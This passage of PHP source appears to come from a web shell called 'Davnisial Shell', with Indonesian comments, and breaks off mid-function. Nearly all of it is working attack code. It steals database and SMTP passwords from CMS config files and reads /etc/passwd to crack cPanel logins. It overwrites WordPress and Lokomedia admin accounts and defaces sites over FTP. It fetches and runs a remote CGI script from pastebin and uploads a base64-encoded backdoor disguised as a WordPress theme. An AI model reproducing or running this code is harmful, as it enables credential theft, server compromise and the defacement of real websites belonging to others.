  1123. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1124. echo "Config => ".$file_conf."<br>";
  1125. echo "CMS => Lokomedia<br>";
  1126. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1127. echo $url_target2;
  1128. } else {
  1129. echo $url_target;
  1130. }
  1131. if(!$update OR !$conn OR !$db) {
  1132. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1133. } else {
  1134. echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1135. }
  1136. mysql_close($conn);
  1137. }
  1138. }
  1139. }
  1140. } else {
  1141. echo "<center>
  1142. <h1>Auto Edit User Config</h1>
  1143. <form method='post'>
  1144. DIR Config: <br>
  1145. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1146. Set User & Pass: <br>
  1147. <input type='text' name='user_baru' value='Davnisial302' placeholder='user_baru'><br>
  1148. <input type='text' name='pass_baru' value='Davnisial302' placeholder='pass_baru'><br>
  1149. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1150. </form>
  1151. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1152. ";
  1153. }
  1154. } elseif($_GET['do'] == 'cpanel') {
  1155. if($_POST['crack']) {
  1156. $usercp = explode("\r\n", $_POST['user_cp']);
  1157. $passcp = explode("\r\n", $_POST['pass_cp']);
  1158. $i = 0;
  1159. foreach($usercp as $ucp) {
  1160. foreach($passcp as $pcp) {
  1161. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1162. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1163. } else {
  1164. $_SESSION[$ucp] = "1";
  1165. $_SESSION[$pcp] = "1";
  1166. if($ucp == '' || $pcp == '') {
  1167.  
  1168. } else {
  1169. $i++;
  1170. if(function_exists('posix_getpwuid')) {
  1171. $domain_cp = file_get_contents("/etc/named.conf");
  1172. if($domain_cp == '') {
  1173. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  1174. } else {
  1175. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1176. foreach($domains_cp[1] as $dj) {
  1177. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1178. $user_cp_url = $user_cp_url['name'];
  1179. if($user_cp_url == $ucp) {
  1180. $dom = "<a href='http://$dj/' target='_blank'><font color=white>$dj</font></a>";
  1181. break;
  1182. }
  1183. }
  1184. }
  1185. } else {
  1186. $dom = "<font color=red>function is Disable by system</font>";
  1187. }
  1188. echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>) domain ($dom)<br>";
  1189. }
  1190. }
  1191. }
  1192. }
  1193. }
  1194. if($i == 0) {
  1195. } else {
  1196. echo "<br>sukses nyolong ".$i." Cpanel by <font color=red>Davnisial Shell.</font>";
  1197. }
  1198. } else {
  1199. echo "<center>
  1200. <form method='post'>
  1201. USER: <br>
  1202. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1203. $_usercp = fopen("/etc/passwd","r");
  1204. while($getu = fgets($_usercp)) {
  1205. if($getu == '' || !$_usercp) {
  1206. echo "<font color=red>Can't read /etc/passwd</font>";
  1207. } else {
  1208. preg_match_all("/(.*?):x:/", $getu, $u);
  1209. foreach($u[1] as $user_cp) {
  1210. if(is_dir("/home/$user_cp/public_html")) {
  1211. echo "$user_cp\n";
  1212. }
  1213. }
  1214. }
  1215. }
  1216. echo "</textarea><br>
  1217. PASS: <br>
  1218. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1219. function cp_pass($dir) {
  1220. $pass = "";
  1221. $dira = scandir($dir);
  1222. foreach($dira as $dirb) {
  1223. if(!is_file("$dir/$dirb")) continue;
  1224. $ambil = file_get_contents("$dir/$dirb");
  1225. if(preg_match("/WordPress/", $ambil)) {
  1226. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1227. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1228. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1229. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1230. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1231. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1232. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1233. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1234. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1235. } elseif(preg_match("/^[client]$/", $ambil)) {
  1236. preg_match("/password=(.*?)/", $ambil, $pass1);
  1237. if(preg_match('/"/', $pass1[1])) {
  1238. $pass1[1] = str_replace('"', "", $pass1[1]);
  1239. $pass .= $pass1[1]."\n";
  1240. } else {
  1241. $pass .= $pass1[1]."\n";
  1242. }
  1243. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1244. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1245. }
  1246. }
  1247. echo $pass;
  1248. }
  1249. $cp_pass = cp_pass($dir);
  1250. echo $cp_pass;
  1251. echo "</textarea><br>
  1252. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1253. </form>
  1254. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1255. }
  1256. } elseif($_GET['do'] == 'cpftp_auto') {
  1257. if($_POST['crack']) {
  1258. $usercp = explode("\r\n", $_POST['user_cp']);
  1259. $passcp = explode("\r\n", $_POST['pass_cp']);
  1260. $i = 0;
  1261. foreach($usercp as $ucp) {
  1262. foreach($passcp as $pcp) {
  1263. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1264. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1265. } else {
  1266. $_SESSION[$ucp] = "1";
  1267. $_SESSION[$pcp] = "1";
  1268. if($ucp == '' || $pcp == '') {
  1269. //
  1270. } else {
  1271. echo "[+] username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
  1272. $ftp_conn = ftp_connect($ip);
  1273. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  1274. if((!$ftp_login) || (!$ftp_conn)) {
  1275. echo "[+] <font color=red>Login Gagal</font><br><br>";
  1276. } else {
  1277. echo "[+] <font color=white>Login Sukses</font><br>";
  1278. $fi = htmlspecialchars($_POST['file_deface']);
  1279. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  1280. if($deface) {
  1281. $i++;
  1282. echo "[+] <font color=white>Deface Sukses</font><br>";
  1283. if(function_exists('posix_getpwuid')) {
  1284. $domain_cp = file_get_contents("/etc/named.conf");
  1285. if($domain_cp == '') {
  1286. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1287. } else {
  1288. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1289. foreach($domains_cp[1] as $dj) {
  1290. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1291. $user_cp_url = $user_cp_url['name'];
  1292. if($user_cp_url == $ucp) {
  1293. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  1294. break;
  1295. }
  1296. }
  1297. }
  1298. } else {
  1299. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1300. }
  1301. } else {
  1302. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  1303. }
  1304. }
  1305. //echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
  1306. }
  1307. }
  1308. }
  1309. }
  1310. }
  1311. if($i == 0) {
  1312. } else {
  1313. echo "<br>sukses deface ".$i." Cpanel by <font color=white>Davnisial Shell.</font>";
  1314. }
  1315. } else {
  1316. echo "<center>
  1317. <form method='post'>
  1318. Filename: <br>
  1319. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  1320. Deface Page: <br>
  1321. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  1322. USER: <br>
  1323. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1324. $_usercp = fopen("/etc/passwd","r");
  1325. while($getu = fgets($_usercp)) {
  1326. if($getu == '' || !$_usercp) {
  1327. echo "<font color=red>Can't read /etc/passwd</font>";
  1328. } else {
  1329. preg_match_all("/(.*?):x:/", $getu, $u);
  1330. foreach($u[1] as $user_cp) {
  1331. if(is_dir("/home/$user_cp/public_html")) {
  1332. echo "$user_cp\n";
  1333. }
  1334. }
  1335. }
  1336. }
  1337. echo "</textarea><br>
  1338. PASS: <br>
  1339. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1340. function cp_pass($dir) {
  1341. $pass = "";
  1342. $dira = scandir($dir);
  1343. foreach($dira as $dirb) {
  1344. if(!is_file("$dir/$dirb")) continue;
  1345. $ambil = file_get_contents("$dir/$dirb");
  1346. if(preg_match("/WordPress/", $ambil)) {
  1347. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1348. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1349. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1350. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1351. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1352. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1353. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1354. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1355. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1356. } elseif(preg_match("/client/", $ambil)) {
  1357. preg_match("/password=(.*)/", $ambil, $pass1);
  1358. if(preg_match('/"/', $pass1[1])) {
  1359. $pass1[1] = str_replace('"', "", $pass1[1]);
  1360. $pass .= $pass1[1]."\n";
  1361. }
  1362. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1363. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1364. }
  1365. }
  1366. echo $pass;
  1367. }
  1368. $cp_pass = cp_pass($dir);
  1369. echo $cp_pass;
  1370. echo "</textarea><br>
  1371. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  1372. </form>
  1373. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1374. }
  1375. } elseif($_GET['do'] == 'smtp') {
  1376. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1377. function scj($dir) {
  1378. $dira = scandir($dir);
  1379. foreach($dira as $dirb) {
  1380. if(!is_file("$dir/$dirb")) continue;
  1381. $ambil = file_get_contents("$dir/$dirb");
  1382. $ambil = str_replace("$", "", $ambil);
  1383. if(preg_match("/JConfig|joomla/", $ambil)) {
  1384. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1385. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1386. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1387. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1388. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1389. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1390. echo "SMTP Host: <font color=white>$smtp_host</font><br>";
  1391. echo "SMTP port: <font color=white>$smtp_port</font><br>";
  1392. echo "SMTP user: <font color=white>$smtp_user</font><br>";
  1393. echo "SMTP pass: <font color=white>$smtp_pass</font><br>";
  1394. echo "SMTP auth: <font color=white>$smtp_auth</font><br>";
  1395. echo "SMTP secure: <font color=white>$smtp_secure</font><br><br>";
  1396. }
  1397. }
  1398. }
  1399. $smpt_hunter = scj($dir);
  1400. echo $smpt_hunter;
  1401. } elseif($_GET['do'] == 'auto_wp') {
  1402. if($_POST['hajar']) {
  1403. $title = htmlspecialchars($_POST['new_title']);
  1404. $pn_title = str_replace(" ", "-", $title);
  1405. if($_POST['cek_edit'] == "Y") {
  1406. $script = $_POST['edit_content'];
  1407. } else {
  1408. $script = $title;
  1409. }
  1410. $conf = $_POST['config_dir'];
  1411. $scan_conf = scandir($conf);
  1412. foreach($scan_conf as $file_conf) {
  1413. if(!is_file("$conf/$file_conf")) continue;
  1414. $config = file_get_contents("$conf/$file_conf");
  1415. if(preg_match("/WordPress/", $config)) {
  1416. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1417. $dbuser = ambilkata($config,"DB_USER', '","'");
  1418. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1419. $dbname = ambilkata($config,"DB_NAME', '","'");
  1420. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1421. $prefix = $dbprefix."posts";
  1422. $option = $dbprefix."options";
  1423. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1424. $db = mysql_select_db($dbname);
  1425. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1426. $result = mysql_fetch_array($q);
  1427. $id = $result[ID];
  1428. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1429. $result2 = mysql_fetch_array($q2);
  1430. $target = $result2[option_value];
  1431. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1432. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1433. echo "<div style='margin: 5px auto;'>";
  1434. if($target == '') {
  1435. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1436. } else {
  1437. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1438. }
  1439. if(!$update OR !$conn OR !$db) {
  1440. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1441. } else {
  1442. echo "<font color=white>sukses di ganti.</font><br>";
  1443. }
  1444. echo "</div>";
  1445. mysql_close($conn);
  1446. }
  1447. }
  1448. } else {
  1449. echo "<center>
  1450. <h1>Auto Edit Title+Content WordPress</h1>
  1451. <form method='post'>
  1452. DIR Config: <br>
  1453. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1454. Set Title: <br>
  1455. <input type='text' name='new_title' value='Hacked by Davnisial' placeholder='New Title'><br><br>
  1456. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1457. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1458. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1459. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1460. </form>
  1461. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1462. ";
  1463. }
  1464. } elseif($_GET['do'] == 'zoneh') {
  1465. if($_POST['submit']) {
  1466. $domain = explode("\r\n", $_POST['url']);
  1467. $nick = $_POST['nick'];
  1468. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1469. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1470. function zoneh($url,$nick) {
  1471. $ch = curl_init("http://www.zone-h.com/notify/single");
  1472. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1473. curl_setopt($ch, CURLOPT_POST, true);
  1474. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1475. return curl_exec($ch);
  1476. curl_close($ch);
  1477. }
  1478. foreach($domain as $url) {
  1479. $zoneh = zoneh($url,$nick);
  1480. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1481. echo "$url -> <font color=white>OK</font><br>";
  1482. } else {
  1483. echo "$url -> <font color=red>ERROR</font><br>";
  1484. }
  1485. }
  1486. } else {
  1487. echo "<center><form method='post'>
  1488. <u>Defacer</u>: <br>
  1489. <input type='text' name='nick' size='50' value='Davnisial'><br>
  1490. <u>Domains</u>: <br>
  1491. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1492. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1493. </form>";
  1494. }
  1495. echo "</center>";
  1496. } elseif($_GET['do'] == 'cgi') {
  1497. $cgi_dir = mkdir('idx_cgi', 0755);
  1498. $file_cgi = "idx_cgi/cgi.izo";
  1499. $isi_htcgi = "AddHandler cgi-script .izo";
  1500. $htcgi = fopen(".htaccess", "w");
  1501. fwrite($htcgi, $isi_htcgi);
  1502. fclose($htcgi);
  1503. $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
  1504. $cgi = fopen($file_cgi, "w");
  1505. fwrite($cgi, $cgi_script);
  1506. fclose($cgi);
  1507. chmod($file_cgi, 0755);
  1508. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1509. } elseif($_GET['do'] == 'fake_root') {
  1510. ob_start();
  1511. $cwd = getcwd();
  1512. $ambil_user = explode("/", $cwd);
  1513. $user = $ambil_user[2];
  1514. if($_POST['reverse']) {
  1515. $site = explode("\r\n", $_POST['url']);
  1516. $file = $_POST['file'];
  1517. foreach($site as $url) {
  1518. $cek = getsource("$url/~$user/$file");
  1519. if(preg_match("/hacked/i", $cek)) {
  1520. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=white>Fake Root!</font><br>";
  1521. }
  1522. }
  1523. } else {
  1524. echo "<center><form method='post'>
  1525. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1526. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1527. Domain: <br>
  1528. <textarea style='width: 450px; height: 250px;' name='url'>";
  1529. reverse($_SERVER['HTTP_HOST']);
  1530. echo "</textarea><br>
  1531. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1532. </form><br>
  1533. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1534. }
  1535. } elseif($_GET['do'] == 'adminer') {
  1536. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1537. function adminer($url, $isi) {
  1538. $fp = fopen($isi, "w");
  1539. $ch = curl_init();
  1540. curl_setopt($ch, CURLOPT_URL, $url);
  1541. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1542. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1543. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1544. curl_setopt($ch, CURLOPT_FILE, $fp);
  1545. return curl_exec($ch);
  1546. curl_close($ch);
  1547. fclose($fp);
  1548. ob_flush();
  1549. flush();
  1550. }
  1551. if(file_exists('adminer.php')) {
  1552. echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1553. } else {
  1554. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1555. echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1556. } else {
  1557. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1558. }
  1559. }
  1560. } elseif($_GET['do'] == 'auto_dwp') {
  1561. if($_POST['auto_deface_wp']) {
  1562. function anucurl($sites) {
  1563. $ch = curl_init($sites);
  1564. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1565. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1566. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1567. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1568. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1569. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1570. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1571. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1572. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1573. $data = curl_exec($ch);
  1574. curl_close($ch);
  1575. return $data;
  1576. }
  1577. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1578. $post = array(
  1579. "log" => "$userr",
  1580. "pwd" => "$pass",
  1581. "rememberme" => "forever",
  1582. "wp-submit" => "$wp_submit",
  1583. "redirect_to" => "$web",
  1584. "testcookie" => "1",
  1585. );
  1586. $ch = curl_init($cek);
  1587. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1588. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1589. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1590. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1591. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1592. curl_setopt($ch, CURLOPT_POST, 1);
  1593. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1594. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1595. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1596. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1597. $data = curl_exec($ch);
  1598. curl_close($ch);
  1599. return $data;
  1600. }
  1601. $scan = $_POST['link_config'];
  1602. $link_config = scandir($scan);
  1603. $script = htmlspecialchars($_POST['script']);
  1604. $user = "Davnisial";
  1605. $pass = "Davnisial";
  1606. $passx = md5($pass);
  1607. foreach($link_config as $dir_config) {
  1608. if(!is_file("$scan/$dir_config")) continue;
  1609. $config = file_get_contents("$scan/$dir_config");
  1610. if(preg_match("/WordPress/", $config)) {
  1611. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1612. $dbuser = ambilkata($config,"DB_USER', '","'");
  1613. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1614. $dbname = ambilkata($config,"DB_NAME', '","'");
  1615. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1616. $prefix = $dbprefix."users";
  1617. $option = $dbprefix."options";
  1618. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1619. $db = mysql_select_db($dbname);
  1620. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1621. $result = mysql_fetch_array($q);
  1622. $id = $result[ID];
  1623. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1624. $result2 = mysql_fetch_array($q2);
  1625. $target = $result2[option_value];
  1626. if($target == '') {
  1627. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1628. } else {
  1629. echo "[+] $target <br>";
  1630. }
  1631. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1632. if(!$conn OR !$db OR !$update) {
  1633. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1634. mysql_close($conn);
  1635. } else {
  1636. $site = "$target/wp-login.php";
  1637. $site2 = "$target/wp-admin/theme-install.php?upload";
  1638. $b1 = anucurl($site2);
  1639. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1640. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1641. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1642. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1643. $www = "m.php";
  1644. $fp5 = fopen($www,"w");
  1645. fputs($fp5,$upload3);
  1646. $post2 = array(
  1647. "_wpnonce" => "$anu2",
  1648. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1649. "themezip" => "@$www",
  1650. "install-theme-submit" => "Install Now",
  1651. );
  1652. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1653. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1654. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1655. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1656. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1657. curl_setopt($ch, CURLOPT_POST, 1);
  1658. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1659. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1660. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1661. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1662. $data3 = curl_exec($ch);
  1663. curl_close($ch);
  1664. $y = date("Y");
  1665. $m = date("m");
  1666. $namafile = "id.php";
  1667. $fpi = fopen($namafile,"w");
  1668. fputs($fpi,$script);
  1669. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1670. curl_setopt($ch6, CURLOPT_POST, true);
  1671. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1672. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1673. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1674. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1675. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  1676. $postResult = curl_exec($ch6);
  1677. curl_close($ch6);
  1678. $as = "$target/k.php";
  1679. $bs = anucurl($as);
  1680. if(preg_match("#$script#is", $bs)) {
  1681. echo "[+] <font color='white'>berhasil mepes...</font><br>";
  1682. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1683. } else {
  1684. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1685. echo "[!!] coba aja manual: <br>";
  1686. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1687. echo "[+] username: <font color=white>$user</font><br>";
  1688. echo "[+] password: <font color=white>$pass</font><br><br>";
  1689. }
  1690. mysql_close($conn);
  1691. }
  1692. }
  1693. }
  1694. } else {
  1695. echo "<center><h1>WordPress Auto Deface</h1>
  1696. <form method='post'>
  1697. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  1698. <input type='text' name='script' height='10' size='50' placeholder='Hacked by Davnisial' required><br>
  1699. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1700. </form>
  1701. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  1702. </center>";
  1703. }
  1704. } elseif($_GET['do'] == 'auto_dwp2') {
  1705. if($_POST['auto_deface_wp']) {
  1706. function anucurl($sites) {
  1707. $ch = curl_init($sites);
  1708. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1709. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1710. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1711. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1712. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1713. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1714. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1715. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1716. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1717. $data = curl_exec($ch);
  1718. curl_close($ch);
  1719. return $data;
  1720. }
  1721. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1722. $post = array(
  1723. "log" => "$userr",
  1724. "pwd" => "$pass",
  1725. "rememberme" => "forever",
  1726. "wp-submit" => "$wp_submit",
  1727. "redirect_to" => "$web",
  1728. "testcookie" => "1",
  1729. );
  1730. $ch = curl_init($cek);
  1731. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1732. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1733. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1734. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1735. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1736. curl_setopt($ch, CURLOPT_POST, 1);
  1737. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1738. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1739. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
